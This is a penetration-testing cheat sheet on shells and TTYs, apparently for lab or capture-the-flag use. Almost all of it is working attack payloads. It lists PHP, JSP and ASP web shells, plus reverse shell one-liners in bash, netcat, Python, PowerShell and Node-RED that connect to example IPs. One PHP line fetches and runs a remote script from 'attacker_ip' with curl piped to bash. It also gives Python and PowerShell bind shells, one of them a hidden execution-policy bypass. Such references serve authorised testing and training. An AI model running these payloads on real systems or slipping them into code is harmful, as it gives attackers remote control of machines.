Shells/TTYs

and Shells

TTY - Teletypewriters

Full TTY

BASH

1. python3 -c 'import pty; pty.spawn("/bin/bash")'

2. CTRL+Z

3. stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

ZSH

1. python3 -c 'import pty; pty.spawn("/bin/bash")'

2. CTRL+Z

3. stty raw -echo; fg %1; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

Clear Terminal

Set the environmental variable from the terminal to xterm:

Change the env to xterm

export TERM=xterm

Terminal Size

Sometimes you may need to adjust your terminal size to the needs of the situation

Check your terminal size

stty size

Now, change it in the target

stty rows <NUMBER> columns <NUMBER>

Use arrow-keys

Just use it

bash

Turn history on

set -o history

• In the .bashrc file, make sure HISTSIZE is not set to 0:

HISTSIZE=1000
HISTFILESIZE=1000

rlwrap enables line editing and history:

Listener example

rlwrap nc -lvnp <port>

Connection example

rlwrap nc 10.10.10.131 6200

Spawning Shells

The pty module in Python allows you to spawn a new process in a pseudo-terminal, effectively creating an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/sh")' 

The script command starts a shell session and records the session to a file. /dev/null is specified as the file where the session is "recorded", but since it's /dev/null, no logging actually happens:

script -qc /bin/bash /dev/null

Also is possible to use echo to pass Python os.system('/bin/bash') to the Python interpreter:

echo os.system('/bin/bash') 

Spawn an interactive shell directly from the terminal:

/bin/sh -i

The command exec "/bin/sh" replaces the running Perl process with a new /bin/sh shell:

perl -e 'exec "/bin/sh";'

Spawn the shell directly

perl: exec "/bin/sh";

Ruby's exec function, like in Perl, replaces the current process with a new process—in this case, /bin/sh:

ruby: exec "/bin/sh"

Runs a shell command from Lua, but unlike in Perl or Ruby, this does not replace the current process. It runs /bin/sh as a child process:

lua: os.execute('/bin/sh')

Replaces the current Ruby interpreter (IRB) with the shell:

exec "/bin/sh";

Used to execute an external shell command:

:!bash

Changes the default shell used by vim's :! command:

:set shell=/bin/bash:shell

Spawn a shell from within the nmap interface, enabling the execution of additional shell commands while scanning:

!sh

PSY

PSY Shell is an interactive PHP REPL (Read-Eval-Print Loop) used normally for debugging.

Print the working directory

getcwd()

Print the current user

get_current_user()

Print system info

phpinfo()

Print contents from directory

scandir("/home")

Print content from file

file_get_contents("/etc/os-release")

Web Shells

Save the shells

echo '<?php system($_REQUEST['cmd']); ?>' > cmd.php

PHP Shell

<?php system($_REQUEST['cmd']); ?>

JSP - Java Server Pages

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

ASP - Active Server Pages

<% eval request("cmd") %>

BASH Reverse Shells

Standard

bash -i >& /dev/tcp/10.10.14.18/1337 0>&1

URL

bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/9001+0>%261'

FIFO

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

URL Encoded

rm%20/tmp/f%3B%20mkfifo%20/tmp/f%3B%20cat%20/tmp/f%20%7C%20/bin/sh%20-i%202%3E%261%20%7C%20nc%2010.10.16.10%204444%20%3E%20/tmp/f

Run it in the background

nohup bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1" &

Python Reverse Shells

PTY

One-liner IPv4

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.6",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Save in a file IPv4

echo 'import pty
import socket
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.6", 4444))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn("/bin/bash")
s.close()' > shell.py

subprocess

One-liner IPv4

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Save it in a file IPv4

echo 'import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.157", 1235))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
subprocess.call(["/bin/sh", "-i"])
s.close()' > shell.py

UDP Reverse shell

import os
os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.16.10 4444 >/tmp/f &").read()

PHP Reverse shell

Direct reverse shell

<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.17/4444 0>&1'");?>

Remote reverse shell

<?php system("curl http://attacker_ip/reverseshell | bash"); ?>

FIFO

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <Port> >/tmp/f"); ?>

Powershell Reverse shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

Node-Red Reverse shell

Import it

[{"id":"7235b2e6.4cdb9c","type":"tab","label":"Flow 1"},{"id":"d03f1ac0.886c28","type":"tcp out","z":"7235b2e6.4cdb9c","host":"","port":"","beserver":"reply","base64":false,"end":false,"name":"","x":786,"y":350,"wires":[]},{"id":"c14a4b00.271d28","type":"tcp in","z":"7235b2e6.4cdb9c","name":"","server":"client","host":"10.10.14.126","port":"9999","datamode":"stream","datatype":"buffer","newline":"","topic":"","base64":false,"x":281,"y":337,"wires":[["4750d7cd.3c6e88"]]},{"id":"4750d7cd.3c6e88","type":"exec","z":"7235b2e6.4cdb9c","command":"","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":517,"y":362.5,"wires":[["d03f1ac0.886c28"],["d03f1ac0.886c28"],["d03f1ac0.886c28"]]}]

• Once you received the connection use another listener you get a more stable shell:

bash -c "bash -i > /dev/tcp/10.10.14.172/3000 0>&1" &

• Then use script:

script -qc /bin/bash /dev/null

Bind Shells

• First, find ports were inbound connections are allowed:

Linux

ss -tuln
netstat -tuln
lsof -i -n

netstat -ano | findstr "LISTEN"
Get-Process | Where-Object {$_.Id -eq (Get-NetTCPConnection | Where-Object {$_.State -eq 'Listen'}).OwningProcess}

Check the firewall rules in Windows:

netsh advfirewall firewall show rule name=all

Python Shell

python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

Powershell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();